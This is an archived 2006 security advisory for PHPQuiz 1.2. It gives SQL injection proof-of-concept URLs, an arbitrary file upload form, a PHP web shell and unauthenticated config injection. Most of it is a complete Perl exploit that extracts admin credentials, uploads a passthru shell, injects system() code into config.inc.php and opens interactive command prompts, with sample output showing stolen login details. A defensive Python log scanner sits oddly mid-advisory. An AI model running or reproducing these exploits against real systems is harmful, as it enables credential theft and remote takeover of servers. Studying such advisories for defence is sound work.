SECURITYVULNS:DOC:14325
Sep 19, 2006

PHPQuiz Multiple Remote Vulnerabilities

2006-09-19 00:00:00
vulners.com

######################################################

Title: PHPQuiz <= v.1.2 Remote SQL injection/Code Execution Exploit

Vendor : PHPQuiz

Website : http://www.phpquiz.com

Version : <= v.1.2

Severity: Critical

Author: Simo64 / simo64_at_morx_org

MorX Security Research Team

http://www.morx.org

http://www.morx.org/phpquiz.txt

Details :

SQL injection

#***************************

The univers parameter in score.php and the quiz_id parameter in home.php are not properly validated and can be used to inject SQL into the query.

PoC : http://localhost/phpquiz/front/?what=score&univers=[SQL]

http://localhost/phpquiz/front/?quiz=quiz&univers=1&step=1&quiz_id=[SQL]

Arbitrary File Upload

#**********************

vulnerable code in back/upload_img.php and admin/upload_img.php near lines 74-76

74 if (($upload) && ($ok_update == "yes")) {
75
76 if(@copy($image, $path)){
77 …

The $upload, $ok_update, $image and $path variables are not sanitized, so they can be used to upload arbitrary files to an attacker-chosen path.

PoC Exploit :

<form enctype="multipart/form-data" method="post" action="http://localhost/phpquiz/back/upload_img.php?upload=1&ok_update=yes&path=./../img_quiz/l3ez.php">
Download File<br>
<input name="image" type="file" size="20"><br>
<input type="submit" name="upload" value="Upload"></form>

The phpquiz/img_quiz/ folder is writable by default, so after uploading a simple PHP shell such as <?passthru($cmd);?>

commands can be launched from: http://localhost/phpquiz/img_quiz/l3ez.php?cmd=ls

PHP Code Injection

#********************

cfgphpquiz/install.php is accessible without authentication; the script is used to

save configuration settings into config.inc.php.

Impact:

Any remote user can post PHP code to the vulnerable file and view the current configuration, which contains sensitive information

such as the admin login and password (stored in plain text).
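As a defender-side illustration added here (it is not part of the advisory and not PHPQuiz code), the following Python classifies web-server access-log entries against the three issues described above: a non-numeric univers or quiz_id value sent to front/, a caller-supplied path parameter to upload_img.php, any request to cfgphpquiz/install.php, and a PHP file other than index.php executed under img_quiz/. The log lines, IPs and file names are constructed.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed Apache-style access log lines (not from the advisory): one benign
# request first, then one request per issue the advisory describes.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Sep/2006:10:01:02 +0000] "GET /phpquiz/front/?what=score&univers=1 HTTP/1.1" 200 5120
10.0.0.9 - - [19/Sep/2006:10:01:07 +0000] "GET /phpquiz/front/?what=score&univers=-64%20UNION%20SELECT%20null,PWD%20FROM%20user/* HTTP/1.1" 200 5300
10.0.0.9 - - [19/Sep/2006:10:01:09 +0000] "GET /phpquiz/front/?quiz=quiz&univers=1&step=1&quiz_id=-1%20UNION%20SELECT%20null HTTP/1.1" 200 4100
10.0.0.9 - - [19/Sep/2006:10:02:11 +0000] "POST /phpquiz/back/upload_img.php?upload=1&ok_update=yes&path=./../img_quiz/x.php HTTP/1.0" 200 210
10.0.0.9 - - [19/Sep/2006:10:02:40 +0000] "GET /phpquiz/cfgphpquiz/install.php?submit=Valider HTTP/1.1" 200 300
10.0.0.9 - - [19/Sep/2006:10:03:01 +0000] "GET /phpquiz/img_quiz/x.php?cmd=id HTTP/1.1" 200 80
"""

REQ_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def classify(line):
    """Return (ip, tag, detail) for a request matching one of the advisory's issues, else None."""
    m = REQ_RE.match(line)
    if not m:
        return None
    ip = m.group("ip")
    url = urlparse(m.group("target"))
    path = url.path.lower()
    q = {k: v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    # 1. front/ expects numeric ids in univers / quiz_id; anything else is injection.
    if path.endswith("/front/"):
        for p in ("univers", "quiz_id"):
            v = q.get(p, "")
            if v and not v.lstrip("-").isdigit():
                return (ip, "sqli", f"{p}={v}")
    # 2. upload_img.php honouring a client-chosen destination path is the arbitrary upload.
    if path.endswith("/upload_img.php") and "path" in q:
        return (ip, "arbitrary-upload", q["path"])
    # 3. install.php should not be reachable at all on a deployed instance.
    if path.endswith("/cfgphpquiz/install.php"):
        return (ip, "install-exposed", url.query)
    # 4. img_quiz/ ships only index.php; any other PHP file there is a dropped shell in use.
    if "/img_quiz/" in path and path.endswith(".php") and not path.endswith("/index.php"):
        return (ip, "webshell", url.path)
    return None

def scan(log_text):
    """Classify every line of a log and return the list of findings in order."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]

if __name__ == "__main__":
    for ip, tag, detail in scan(SAMPLE_LOG):
        print(f"{ip:10} {tag:18} {detail}")
```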

#***********************************************************************************

simo64@localhost:~$ phpquiz.pl morx.org /phpquiz/ 1

/-----------------------------------------------------------\

| PHPQuiz v.1.2 Remote SQL injection/Code Execution Exploit |

| Coded by simo64 - simo64_morx.org |

| www.morx.org |

|-----------------------------------------------------------|

| MorX Security Research Team © |

\-----------------------------------------------------------/

Connecting to www.morx.org … Connected !

[+] Injecting credentials

Sending Data …

SQL injection Succeded !

User EMail : [email protected]

User Login : admin

User Passwd : password

[+] Exec CMD by uploading a shell Connected !

Uploading shell … [OK]

Checking if successfully Uploaded … [OK]

NOW YOU CAN LAUNCH COMMANDS

simo64[at]morx.org :~$ id

uid=48(apache) gid=48(apache) groups=48(apache),2522(psaserv)

simo64[at]morx.org :~$ pwd

/home/morx/public_html/phpquiz/img_quiz

simo64[at]morx.org :~$ ls

id_1.gif

id_2.gif

id_3.gif

id_4.gif

index.php

zaz.php

simo64[at]morx.org :~$ exit

#!/usr/bin/perl

use IO::Socket ;
use LWP::Simple ;

print q(

/-----------------------------------------------------------\
| PHPQuiz v.1.2 Remote SQL injection/Code Execution Exploit |
| Coded by simo64 - simo64_morx.org |
| www.morx.org |
|-----------------------------------------------------------|
| MorX Security Research Team © |
\-----------------------------------------------------------/

);

sub usage(){

print "\nUsage :perl $0 siteurl /path/ userid\n";
print "\nExemple : perl $0 phpquiz.com /phpquiz/ 1\n";

}

if(!@ARGV){
&usage();
exit(0)
}

$host = $ARGV[0];
$path = $ARGV[1];
$uid = $ARGV[2];
$success = null ;
$injected = 0;
$injcheck = $path."cfgphpquiz/config.inc.php?xD=l3fou";
$phpinject = $path."cfgphpquiz/install.php?submit=Valider&config_alert_email_name=%22;echo%20\@\$xD;\@system(\$morx);//MorX%20RulZ%20=)";
$injectuser = "front/?what=score&univers=-64%20UNION%20SELECT%20null,LOGIN,null,null,null,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/*";
$injectpass = "front/?what=score&univers=-64%20UNION%20SELECT%20null,PWD,null,null,null,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/*";
$injectmail = "front/?what=score&univers=-64%20UNION%20SELECT%20null,EMAIL,null,null,null,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/*";

syswrite STDOUT , "Connecting to $host …";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

die "\n\nUnable to connect to $host " unless($sock) ;

syswrite STDOUT , "\tConnected !\n\n\[+] Injecting credentials\n\nSending Data …";

    print $sock "GET $path$injectmail HTTP/1.1\n";
    print $sock "Host: $host\n";
    print $sock "Connection: Close\n\n";

    while($res = <$sock>){
            if($res =~ /anim_fleche_droite.gif" border="0">&nbsp;&quot;(.*?)&quot;<\/a>/){
                    $usermail = $1 ;
                    $success = "ok" ;
                    }
    }

if($success eq "ok") {

syswrite STDOUT , "\n\nSQL injection Succeded !\n\n";
sleep 2 ;
syswrite STDOUT , "\tUser EMail : $usermail\n";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

    print $sock "GET $path$injectuser HTTP/1.1\n";
    print $sock "Host: $host\n";
    print $sock "Connection: Close\n\n";

    while($res = <$sock>){
            if($res =~ />&nbsp;&quot;(.*?)&quot;/){
                    $userlogin = $1 ;
                    }
    }
    syswrite STDOUT , "\tUser Login  : $userlogin\n";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

    print $sock "GET $path$injectpass HTTP/1.1\n";
    print $sock "Host: $host\n";
    print $sock "Connection: Close\n\n";

    while($res = <$sock>){
            if($res =~ />&nbsp;&quot;(.*?)&quot;/){
                    $userpass = $1 ;
                    }
    }

syswrite STDOUT , "\tUser Passwd : $userpass\n\n";

} else {print "\n\nInjecting credentials Exploit Failed !\n\n";}

sleep 2;

# PART2 Remote Command Execution by uploading shell

syswrite STDOUT , "\n[+] Exec CMD by uploading a shell";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

die "\n\nUnable to connect to $host " unless($sock) ;

syswrite STDOUT , "\tConnected !\n\n";
syswrite STDOUT , "Uploading shell …";

$data='-----------------------------7d61592213049c
Content-Disposition: form-data; name="dir"

/
-----------------------------7d61592213049c
Content-Disposition: form-data; name="image"; filename="zaz.php"
Content-Type: text/plain

<?php
if (get_magic_quotes_gpc()){$_GET[\'cmd\']=stripslashes($_GET[\'cmd\']);}
passthru($_GET[\'cmd\']);
?>
-----------------------------7d61592213049c
Content-Disposition: form-data; name="submit"

Upload
-----------------------------7d61592213049c--
';

$script = $path."/back/upload_img.php?upload=1&ok_update=yes&path=./…/img_quiz/zaz.php";

$len = length $data ;

print $sock "POST $script HTTP/1.0\r\n";
print $sock "Content-Type: multipart/form-data; boundary=---------------------------7d61592213049c\r\n";
print $sock "Host: $host\r\n";
print $sock "Content-Length: $len\r\n";
print $sock "Connection: close\r\n\r\n";
print $sock $data;

syswrite STDOUT , "\t[OK]\n\nChecking if successfully Uploaded … ";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

print $sock "HEAD $path"."img_quiz/zaz.php HTTP/1.0\r\n";
print $sock "Host: $host\r\n";
print $sock "Connection: close\n\n";

while($rep = <$sock>){
if($rep =~ /HTTP\/1.1 200 OK/) { $success = 1; }
}
if($success == 1){

    print "\t[OK]\n\n\t\tNOW YOU CAN LAUNCH COMMANDS\n\n";

    while(){
    print "simo64[at]morx.org :~\$ ";
    chop($cmd=<STDIN>);
    exit() if ($cmd eq 'exit');
    $result = get("http://$host".$path."img_quiz/zaz.php?cmd=$cmd");
    print $result;
    }

}
else { print "\tFailed !\n\nFile Upload Failed\n\n" }

# STEP 3 Injecting PHP code into config.inc.php file

print "\n[+] Injecting PHP Code…\n\nConnecting …";

my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

die "Connot Connect to $host !" unless($sock);

print "\tConnected !\n\nSending Data …\t";

    print $sock "GET $phpinject HTTP/1.1\n";
    print $sock "Host: $host\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\n";
    print $sock "User-Agent: MorX-Zilla\n";
    print $sock "Connection: Close\n\n";

print "\t OK\n\nChecking if code injected …";

my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

    print $sock "GET $injcheck HTTP/1.1\n";
    print $sock "Host: $host\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\n";
    print $sock "User-Agent: MorX-Zilla\n";
    print $sock "Connection: Close\n\n";

while($check = <$sock>){
if($check =~ /l3fou/) { $injected = 1; }
}
if($injected == 1 ){
print "\tSucceded !\n\n\tNOW YOU ARE IN !\n\n";

while(){
print "simo\@morx.org :~\$ ";
$cmd = <STDIN>;
chop($cmd);
exit(0) if($cmd eq "exit");
$result = get("http://".$host.$path."cfgphpquiz/config.inc.php?morx=$cmd");
print $result;
}
}
else {print "\tFailed\n\nPHPCode Injection Failed !\n\n";}